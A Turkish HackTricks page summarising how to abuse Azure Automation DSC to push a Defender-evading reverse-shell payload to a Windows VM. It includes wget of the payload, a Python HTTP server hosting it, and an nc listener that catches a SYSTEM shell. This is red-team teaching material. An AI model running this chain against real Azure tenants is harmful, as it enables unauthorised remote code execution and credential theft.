Az - State Configuration RCE

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

Tam yazıyı buradan kontrol edin: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Uzaktan Sunucu (C2) Altyapısı Hazırlama ve Adımlarının Özeti

Genel Bakış

Bu süreç, Windows Defender'ı atlatan değiştirilmiş bir Nishang Invoke-PowerShellTcp.ps1 yükünü barındırmak için uzaktan bir sunucu altyapısı kurmayı içerir. Yük, 40.84.7.74 IP'li bir Kali Linux makinesinden basit bir Python HTTP sunucusu kullanılarak sunulur. İşlem, aşağıdaki adımlarla gerçekleştirilir:

Adım 1 — Dosyaları Oluşturma

  • Gerekli Dosyalar: İki PowerShell komut dosyası gereklidir:

  1. reverse_shell_config.ps1: Yükü alıp yürüten bir Desired State Configuration (DSC) dosyasıdır. GitHub üzerinden elde edilebilir.

  2. push_reverse_shell_config.ps1: Yapılandırmayı sanal makineye yayımlayan bir komut dosyasıdır. GitHub üzerinde bulunur.

  • Özelleştirme: Bu dosyalardaki değişkenler ve parametreler, kullanıcının belirli ortamına göre uyarlanmalıdır. Bu, kaynak adları, dosya yolları ve sunucu/yük tanımlayıcıları gibi unsurları içerir.

Adım 2 — Yapılandırma Dosyasını Sıkıştırma

  • reverse_shell_config.ps1 dosyası .zip formatına sıkıştırılır ve Azure Depolama Hesabına transfer için hazır hale getirilir.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Adım 3 — Depolama Bağlamını Ayarla ve Yükle

  • Sıkıştırılmış yapılandırma dosyası, Azure'nin Set-AzStorageBlobContent komut dosyasını kullanarak önceden tanımlanmış bir Azure Depolama kabına, azure-pentest'e yüklenir.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Adım 4 — Kali Box'ı Hazırlama

  • Kali sunucusu, RevPS.ps1 yükünü bir GitHub deposundan indirir.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
  • Adım 5 — Yapılandırma Dosyasını Yayımla

  • Yapılandırma dosyası çalıştırılır ve ters kabuk betiği belirtilen konuma Windows VM üzerine dağıtılır.

Adım 6 — Yükü Barındır ve Dinleyiciyi Kur

  • Bir Python SimpleHTTPServer, yükü barındırmak için başlatılır ve gelen bağlantıları yakalamak için bir Netcat dinleyicisi kurulur.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
  • Zamanlanmış görev, payload'ı çalıştırarak SYSTEM düzeyinde ayrıcalıklar elde eder.

Sonuç

Bu sürecin başarılı bir şekilde gerçekleştirilmesi, kimlik bilgilerinin çalınması veya saldırının birden fazla sanal makineye yayılması gibi birçok olasılığı beraberinde getirir. Kılavuz, Azure Automation DSC alanında sürekli öğrenmeyi ve yaratıcılığı teşvik eder.

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

Last updated